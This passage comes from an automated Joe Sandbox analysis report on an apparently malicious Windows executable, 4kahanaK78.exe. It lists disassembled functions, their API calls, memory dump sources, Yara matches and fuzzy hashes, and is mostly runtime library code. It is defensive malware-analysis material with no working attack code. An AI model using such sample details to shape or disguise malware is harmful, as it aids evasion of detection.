                                    • GetConsoleOutputCP.KERNEL32(?,00000001,?), ref: 1000B720
                                    • __fassign.LIBCMT ref: 1000B905
                                    • __fassign.LIBCMT ref: 1000B922
                                    • WriteFile.KERNEL32(?,10009A1A,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 1000B96A
                                    • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 1000B9AA
                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 1000BA52
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3309607086.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                    • Associated: 00000000.00000002.3309587632.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000000.00000002.3309627188.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000000.00000002.3309646682.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_10000000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: FileWrite__fassign$ConsoleErrorLastOutput
                                    • String ID:
                                    • API String ID: 1735259414-0
                                    • Opcode ID: 32d4bb0d0fb78e9b700753294cc147154fce03c70a5209c95aaa7034331b4c1e
                                    • Instruction ID: 817bf58f8fa712ded97291eda06853010b29bdec4c6be72b636a35a8a914ce65
                                    • Opcode Fuzzy Hash: 32d4bb0d0fb78e9b700753294cc147154fce03c70a5209c95aaa7034331b4c1e
                                    • Instruction Fuzzy Hash: 9DC1CF75D006989FEB11CFE8C8809EDBBB5EF09354F28816AE855F7245D631AE42CB60
                                    Function 10003DFA Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • GetLastError.KERNEL32(00000001,?,10003C01,10002DB0,100027A7,?,100029DF,?,00000001,?,?,00000001,?,100167D8,0000000C,10002AD8), ref: 10003E08
                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 10003E16
                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 10003E2F
                                    • SetLastError.KERNEL32(00000000,100029DF,?,00000001,?,?,00000001,?,100167D8,0000000C,10002AD8,?,00000001,?), ref: 10003E81
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3309607086.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                    • Associated: 00000000.00000002.3309587632.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000000.00000002.3309627188.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000000.00000002.3309646682.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_10000000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: ErrorLastValue___vcrt_
                                    • String ID:
                                    • API String ID: 3852720340-0
                                    • Opcode ID: 6af44c204d35e0e87e783e409bd385f4178bd984da96cbfbdded34095f80bc15
                                    • Instruction ID: cea4d4d1ab0609a38d25ccf127c64f3389598815618148a6298b3cccc824aafb
                                    • Opcode Fuzzy Hash: 6af44c204d35e0e87e783e409bd385f4178bd984da96cbfbdded34095f80bc15
                                    • Instruction Fuzzy Hash: 610124379083A66EF25BC7B49CC964B379AEB0D3F53208329F114410F8EFA29E45A244
                                    Function 04B4B00B Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • GetLastError.KERNEL32(?,?,04B4B002,04B4A5C6,04B49C00), ref: 04B4B019
                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 04B4B027
                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 04B4B040
                                    • SetLastError.KERNEL32(00000000,04B4B002,04B4A5C6,04B49C00), ref: 04B4B092
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3308616404.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_4b40000_4kahanaK78.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorLastValue___vcrt_
                                    • String ID:
                                    • API String ID: 3852720340-0
                                    • Opcode ID: 6119c639a046b9dd424e980e58b60d2be106995ff750bb25c6883d2720f1beb8
                                    • Instruction ID: 5d97d5de8773b9d009742cf9eef0d20d8d296e21d72a888fe39dd23c57b746e0
                                    • Opcode Fuzzy Hash: 6119c639a046b9dd424e980e58b60d2be106995ff750bb25c6883d2720f1beb8
                                    • Instruction Fuzzy Hash: 9D01AC3270D3116FBB346FB47C849762B54EB8167A72102B9F724562E1EF59F8127144
                                    Function 0040ADA4 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • GetLastError.KERNEL32(?,?,0040AD9B,0040A35F,00409999), ref: 0040ADB2
                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0040ADC0
                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0040ADD9
                                    • SetLastError.KERNEL32(00000000,0040AD9B,0040A35F,00409999), ref: 0040AE2B
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3306439694.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.3306439694.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: ErrorLastValue___vcrt_
                                    • String ID:
                                    • API String ID: 3852720340-0
                                    • Opcode ID: 6119c639a046b9dd424e980e58b60d2be106995ff750bb25c6883d2720f1beb8
                                    • Instruction ID: f4b61bc4878066cd9e5532c4ff7823403916b0aca9ffed94e046062e6da044f3
                                    • Opcode Fuzzy Hash: 6119c639a046b9dd424e980e58b60d2be106995ff750bb25c6883d2720f1beb8
                                    • Instruction Fuzzy Hash: 6201D8722493125FE6342A76BC459572A54EB51779720033FF910B71E2EF3D4C32558E
                                    Function 04CF4F18 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 206COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000003.2594383754.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_3_4ce0000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: _free_strpbrk
                                    • String ID: *?
                                    • API String ID: 3300345361-2564092906
                                    • Opcode ID: 9801757e2809db45aacd2951d7023101c81a7ef7fa1d77123c738ef8fc315dd7
                                    • Instruction ID: 74ce9c3951af57ab81168c2b549ef3ab89f4257994a153330f65b8d48fe9ed26
                                    • Opcode Fuzzy Hash: 9801757e2809db45aacd2951d7023101c81a7ef7fa1d77123c738ef8fc315dd7
                                    • Instruction Fuzzy Hash: 26615075E00219AFDB14CFA9C8809EEFBF6EF48314B258169DA05E7301E775BE418B90
                                    Function 04B55D7F Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 206COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3308616404.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_4b40000_4kahanaK78.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: _free_strpbrk
                                    • String ID: *?
                                    • API String ID: 3300345361-2564092906
                                    • Opcode ID: 9801757e2809db45aacd2951d7023101c81a7ef7fa1d77123c738ef8fc315dd7
                                    • Instruction ID: 1b74f13dbcba2150a1fd9868d0adae7fc2dc7661cc718da73cb4b4ef5f34790c
                                    • Opcode Fuzzy Hash: 9801757e2809db45aacd2951d7023101c81a7ef7fa1d77123c738ef8fc315dd7
                                    • Instruction Fuzzy Hash: 3E615F75E00219AFDF24DFA8C8806EDFBF5EF48314B1585AAE815F7354D631AE418B90
                                    Function 00415B18 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 206COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3306439694.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.3306439694.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: _free_strpbrk
                                    • String ID: *?
                                    • API String ID: 3300345361-2564092906
                                    • Opcode ID: 0b6f9c8e298a88ef6bfcf1d60ea57791d65df11c988ce29e8962c90e9ece18a3
                                    • Instruction ID: 08919aac2af5baaa0bc26bb502442345b411eba09a4371073371dd33b5eb5490
                                    • Opcode Fuzzy Hash: 0b6f9c8e298a88ef6bfcf1d60ea57791d65df11c988ce29e8962c90e9ece18a3
                                    • Instruction Fuzzy Hash: 34613F75E00619DFCB14CFA9C8815EEFBF5EF88354B24816AE815F7300E675AE818B94
                                    Function 10008336 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83COMMON
                                    Download Yara Rule
                                    Strings
                                    • C:\Users\user\Desktop\4kahanaK78.exe, xrefs: 1000833B
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3309607086.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                    • Associated: 00000000.00000002.3309587632.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000000.00000002.3309627188.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000000.00000002.3309646682.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_10000000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: C:\Users\user\Desktop\4kahanaK78.exe
                                    • API String ID: 0-334991286
                                    • Opcode ID: ddfca3805b10fb0c405c12195d97b130fb222a2330a05fb996068ff6147a541c
                                    • Instruction ID: d1df9cd49d1a9d965a935ddcfcfd3b9185eaf4079d6f623355f3cc1fa6217373
                                    • Opcode Fuzzy Hash: ddfca3805b10fb0c405c12195d97b130fb222a2330a05fb996068ff6147a541c
                                    • Instruction Fuzzy Hash: C821D075A00206BFF710DF61CC8090B779CFF846E47108124FA949215AEB31EF0087A0
                                    Function 04B56383 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83COMMON
                                    Download Yara Rule
                                    Strings
                                    • C:\Users\user\Desktop\4kahanaK78.exe, xrefs: 04B56388
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3308616404.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_4b40000_4kahanaK78.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: C:\Users\user\Desktop\4kahanaK78.exe
                                    • API String ID: 0-334991286
                                    • Opcode ID: 93954dfdee92f46bb96adc8c87a9eb3aaf0f63e636dd7cac714efb5796973790
                                    • Instruction ID: f552e073e65239589d6095b5991a64c7f020a132d82bace3d2b8a8f69f5e1887
                                    • Opcode Fuzzy Hash: 93954dfdee92f46bb96adc8c87a9eb3aaf0f63e636dd7cac714efb5796973790
                                    • Instruction Fuzzy Hash: 7221D471600105BFEB20BF698C80E6BB7ADEF402A874185A4FD2DC7260E731FC519760
                                    Function 0040BE17 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • FreeLibrary.KERNEL32(00000000,?,?,?,0040BED8,?,?,0042B000,00000000,?,0040C003,00000004,InitializeCriticalSectionEx,0041EAF4,InitializeCriticalSectionEx,00000000), ref: 0040BEA7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3306439694.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.3306439694.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: FreeLibrary
                                    • String ID: api-ms-
                                    • API String ID: 3664257935-2084034818
                                    • Opcode ID: 8c81ecf0019ecd7373f14f2a550921ad389bcfade9b3345979a598c502b3af19
                                    • Instruction ID: 1d2ba87bd7351691bab4046b775a4f225d6c09ed93031ba1482b23a36008251d
                                    • Opcode Fuzzy Hash: 8c81ecf0019ecd7373f14f2a550921ad389bcfade9b3345979a598c502b3af19
                                    • Instruction Fuzzy Hash: 1B11C135A41620ABCB228B68DC45BDA7794EF02760F114632EE05B73C0D778EC058ADD
                                    Function 10005FAA Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30libraryloaderCOMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,10005F5C,?,?,10005F24,?,?,?), ref: 10005FBF
                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 10005FD2
                                    • FreeLibrary.KERNEL32(00000000,?,?,10005F5C,?,?,10005F24,?,?,?), ref: 10005FF5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3309607086.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                    • Associated: 00000000.00000002.3309587632.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000000.00000002.3309627188.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000000.00000002.3309646682.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_10000000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: AddressFreeHandleLibraryModuleProc
                                    • String ID: CorExitProcess$mscoree.dll
                                    • API String ID: 4061214504-1276376045
                                    • Opcode ID: 72e1e31047de7c6f2cb357695238b525e407410b4f5b93aeb37e18346654144b
                                    • Instruction ID: ce5d81a5a20928f213bfffb098e7a6005668583a74e8757c7f390ca8b74bdc84
                                    • Opcode Fuzzy Hash: 72e1e31047de7c6f2cb357695238b525e407410b4f5b93aeb37e18346654144b
                                    • Instruction Fuzzy Hash: 1BF01C31904129FBEB06DB91CD0ABEE7AB9EB047D6F1041B4F501A21A4CBB5CE41DB90
                                    Function 0040EF4F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30libraryloaderCOMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,0040EF44,?,?,0040EF0C,00000000,7591DF80,?), ref: 0040EF64
                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0040EF77
                                    • FreeLibrary.KERNEL32(00000000,?,?,0040EF44,?,?,0040EF0C,00000000,7591DF80,?), ref: 0040EF9A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3306439694.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.3306439694.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: AddressFreeHandleLibraryModuleProc
                                    • String ID: CorExitProcess$mscoree.dll
                                    • API String ID: 4061214504-1276376045
                                    • Opcode ID: 607d73432645c26095c79918e0b94193a9778d3018f0e4e6e685341166a2a245
                                    • Instruction ID: a9aeb9bb373945a448fb4c2f2a76f55d061337ba3b70deabe2e5838c542f66b1
                                    • Opcode Fuzzy Hash: 607d73432645c26095c79918e0b94193a9778d3018f0e4e6e685341166a2a245
                                    • Instruction Fuzzy Hash: E0F0A070A0421AFBCB119B52ED09BDEBF78EF00759F144071F905B21A0CB788E11DB98
                                    Function 1000A5DD Relevance: 7.7, APIs: 5, Instructions: 244COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,1000A899,00000000,00000000,00000000,00000001,?,?,?,?,00000001), ref: 1000A680
                                    • __alloca_probe_16.LIBCMT ref: 1000A736
                                    • __alloca_probe_16.LIBCMT ref: 1000A7CC
                                    • __freea.LIBCMT ref: 1000A837
                                    • __freea.LIBCMT ref: 1000A843
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3309607086.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                    • Associated: 00000000.00000002.3309587632.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000000.00000002.3309627188.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000000.00000002.3309646682.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_10000000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: __alloca_probe_16__freea$Info
                                    • String ID:
                                    • API String ID: 2330168043-0
                                    • Opcode ID: 8cc199d558b997503fdcee74a17b35d0cfef9a10842a3a6720ec3a40d10b29e0
                                    • Instruction ID: 1dd90d70d9504398cfa9d6ef4ea6864651e072268de8b4bf5549d7cf43e308ef
                                    • Opcode Fuzzy Hash: 8cc199d558b997503fdcee74a17b35d0cfef9a10842a3a6720ec3a40d10b29e0
                                    • Instruction Fuzzy Hash: C081A472D042569BFF11CE648C81ADE7BF5EF0B6D0F158265E904AB148DB369DC1CBA0
                                    Function 04CF2AA0 Relevance: 7.7, APIs: 5, Instructions: 199COMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000003.2594383754.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_3_4ce0000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: __freea$__alloca_probe_16
                                    • String ID:
                                    • API String ID: 3509577899-0
                                    • Opcode ID: 378295b6f49c7a1482985147ff9c11c2e1bf4f3a81760b0e32bf93aa04d95b4b
                                    • Instruction ID: f2b5e5426fedb8598fc76fae10d55257e5a04a8e30a18f0e2ceb2f17756af3bc
                                    • Opcode Fuzzy Hash: 378295b6f49c7a1482985147ff9c11c2e1bf4f3a81760b0e32bf93aa04d95b4b
                                    • Instruction Fuzzy Hash: 5C51F576600206ABFF605F658C81EBB3BABDF44754F1901A8FE05D7140E73AFD11A6A0
                                    Function 1000AFB7 Relevance: 7.7, APIs: 5, Instructions: 199COMMON
                                    Download Yara Rule
                                    APIs
                                    • __alloca_probe_16.LIBCMT ref: 1000B03B
                                    • __alloca_probe_16.LIBCMT ref: 1000B101
                                    • __freea.LIBCMT ref: 1000B16D
                                      • Part of subcall function 100079EE: RtlAllocateHeap.NTDLL(00000000,10001F83,?,?,10002743,10001F83,?,10001F83,0007A120), ref: 10007A20
                                    • __freea.LIBCMT ref: 1000B176
                                    • __freea.LIBCMT ref: 1000B199
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3309607086.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                    • Associated: 00000000.00000002.3309587632.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000000.00000002.3309627188.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000000.00000002.3309646682.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_10000000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: __freea$__alloca_probe_16$AllocateHeap
                                    • String ID:
                                    • API String ID: 1423051803-0
                                    • Opcode ID: e63f2a8978e00137fdd1d9a780ebd3875915c182c7a46276be8a26015b9944ff
                                    • Instruction ID: ca0e6193c5ab93552cef367aef9b2c098b98f9a761b18089088d519bce5e91c7
                                    • Opcode Fuzzy Hash: e63f2a8978e00137fdd1d9a780ebd3875915c182c7a46276be8a26015b9944ff
                                    • Instruction Fuzzy Hash: 6651C072600616ABFB21CF64CC81EAF37E9EF456D0F624129FD14A7158EB34EC5197A0
                                    Function 004136A0 Relevance: 7.7, APIs: 5, Instructions: 199COMMON
                                    Download Yara Rule
                                    APIs
                                    • __alloca_probe_16.LIBCMT ref: 00413724
                                    • __alloca_probe_16.LIBCMT ref: 004137EA
                                    • __freea.LIBCMT ref: 00413856
                                      • Part of subcall function 0041249E: RtlAllocateHeap.NTDLL(00000000,?,?,?,0040A15B,?,?,?,004010EC,?,004034A7,?,?,?), ref: 004124D0
                                    • __freea.LIBCMT ref: 0041385F
                                    • __freea.LIBCMT ref: 00413882
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3306439694.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.3306439694.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: __freea$__alloca_probe_16$AllocateHeap
                                    • String ID:
                                    • API String ID: 1423051803-0
                                    • Opcode ID: 108019662ccab921f27eff110a88a80a1d8b3600edd5f6f257505aea3f790572
                                    • Instruction ID: 356f55c8d52bf468307c9bd9aee3ed648f54657124d7a114e97aef17e3d97ec8
                                    • Opcode Fuzzy Hash: 108019662ccab921f27eff110a88a80a1d8b3600edd5f6f257505aea3f790572
                                    • Instruction Fuzzy Hash: 6151D3B2600206ABEF20AF55CC41EEB36E9EF44755F15412EFD18E7290D738DE9186A8
                                    Function 04B42BB7 Relevance: 7.6, APIs: 5, Instructions: 113memorywindowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • VirtualProtect.KERNEL32(?,?,?,?), ref: 04B42C5F
                                    • GetLastError.KERNEL32(00000400,?,00000000,00000000,?,?,?,?), ref: 04B42C74
                                    • FormatMessageA.KERNEL32(00001300,00000000,00000000,?,?,?,?), ref: 04B42C82
                                    • LocalAlloc.KERNEL32(00000040,?,?,?,?,?), ref: 04B42C9D
                                    • OutputDebugStringA.KERNEL32(00000000,?,?), ref: 04B42CBC
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3308616404.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_4b40000_4kahanaK78.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AllocDebugErrorFormatLastLocalMessageOutputProtectStringVirtual
                                    • String ID:
                                    • API String ID: 2509773233-0
                                    • Opcode ID: 98a23b1f51539c79b15504070a912fe8a1d772cf35a21b11453b2abeaae28325
                                    • Instruction ID: 8e0c3b542556c10dfa7e3922ea7325ac6b0ed9a3e589e4877d3c30077f841730
                                    • Opcode Fuzzy Hash: 98a23b1f51539c79b15504070a912fe8a1d772cf35a21b11453b2abeaae28325
                                    • Instruction Fuzzy Hash: 71310471B00014AFDB18DF68DC45FBAB768EF88704F0541E9F905EB252DB31A912EB94
                                    Function 10002986 Relevance: 7.6, APIs: 5, Instructions: 87COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3309607086.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                    • Associated: 00000000.00000002.3309587632.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000000.00000002.3309627188.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000000.00000002.3309646682.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_10000000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: dllmain_raw$dllmain_crt_dispatch
                                    • String ID:
                                    • API String ID: 3136044242-0
                                    • Opcode ID: c90a93295f6bc331d57bb8f47297671563acdadf013a8df03a89f4d1d37c88ce
                                    • Instruction ID: 86b98bd5048e9daedf5606c3f96c4c2c05ee8e367bee4de8e4e1682ebb6c2564
                                    • Opcode Fuzzy Hash: c90a93295f6bc331d57bb8f47297671563acdadf013a8df03a89f4d1d37c88ce
                                    • Instruction Fuzzy Hash: EA21A476E0526AAFFB32CF55CC41ABF3AA9EB85AD0F014115FC4867258CB309D419BD1
                                    Function 04CF63E1 Relevance: 7.5, APIs: 5, Instructions: 40COMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000003.2594383754.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_3_4ce0000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: _free
                                    • String ID:
                                    • API String ID: 269201875-0
                                    • Opcode ID: 66f692938bcf18abe0cb3e5c7653619a9fabf3dc7bd25fd00b9023d19967cfd6
                                    • Instruction ID: d3862564c1c448d0eb3923a45cdf49f18f6833f21556cac3654b71cf7d9cec13
                                    • Opcode Fuzzy Hash: 66f692938bcf18abe0cb3e5c7653619a9fabf3dc7bd25fd00b9023d19967cfd6
                                    • Instruction Fuzzy Hash: F6F06872701100A785A4EF5DEC86C1677DBAB00720BA48819F544D7503CB3DF9529655
                                    Function 1000C51E Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • _free.LIBCMT ref: 1000C536
                                      • Part of subcall function 10007A3C: RtlFreeHeap.NTDLL(00000000,00000000,?,100066F0), ref: 10007A52
                                      • Part of subcall function 10007A3C: GetLastError.KERNEL32(?,?,100066F0), ref: 10007A64
                                    • _free.LIBCMT ref: 1000C548
                                    • _free.LIBCMT ref: 1000C55A
                                    • _free.LIBCMT ref: 1000C56C
                                    • _free.LIBCMT ref: 1000C57E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3309607086.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                    • Associated: 00000000.00000002.3309587632.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000000.00000002.3309627188.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000000.00000002.3309646682.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_10000000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: _free$ErrorFreeHeapLast
                                    • String ID:
                                    • API String ID: 776569668-0
                                    • Opcode ID: 5af9cd1d934eff50961f68469d6981d65bd4349cdb7ac1437da5aad4e87a5e75
                                    • Instruction ID: 9141c028a1f6e8267eca5b553c4c44ea57822cd8596d4ab818939ac7a44c1903
                                    • Opcode Fuzzy Hash: 5af9cd1d934eff50961f68469d6981d65bd4349cdb7ac1437da5aad4e87a5e75
                                    • Instruction Fuzzy Hash: BEF0E739A046289BE650DB68ECC2C1A73D9FB456E17608805F448E7699CB34FFC08AA4
                                    Function 04B57248 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • _free.LIBCMT ref: 04B57260
                                      • Part of subcall function 04B51D29: HeapFree.KERNEL32(00000000,00000000,?,04B572DB,?,00000000,?,?,?,04B57302,?,00000007,?,?,04B575E1,?), ref: 04B51D3F
                                      • Part of subcall function 04B51D29: GetLastError.KERNEL32(?,?,04B572DB,?,00000000,?,?,?,04B57302,?,00000007,?,?,04B575E1,?,?), ref: 04B51D51
                                    • _free.LIBCMT ref: 04B57272
                                    • _free.LIBCMT ref: 04B57284
                                    • _free.LIBCMT ref: 04B57296
                                    • _free.LIBCMT ref: 04B572A8
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3308616404.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_4b40000_4kahanaK78.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: _free$ErrorFreeHeapLast
                                    • String ID:
                                    • API String ID: 776569668-0
                                    • Opcode ID: 66f692938bcf18abe0cb3e5c7653619a9fabf3dc7bd25fd00b9023d19967cfd6
                                    • Instruction ID: 483566ea0ef53b89664ed2dd7fd9b40260e4331b71de85a4830a2d39d41bba32
                                    • Opcode Fuzzy Hash: 66f692938bcf18abe0cb3e5c7653619a9fabf3dc7bd25fd00b9023d19967cfd6
                                    • Instruction Fuzzy Hash: CEF04432B142146BCA34DB58F586E16B3DDEB01720BA40885FC28D7560CF25FC914A54
                                    Function 00416FE1 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • _free.LIBCMT ref: 00416FF9
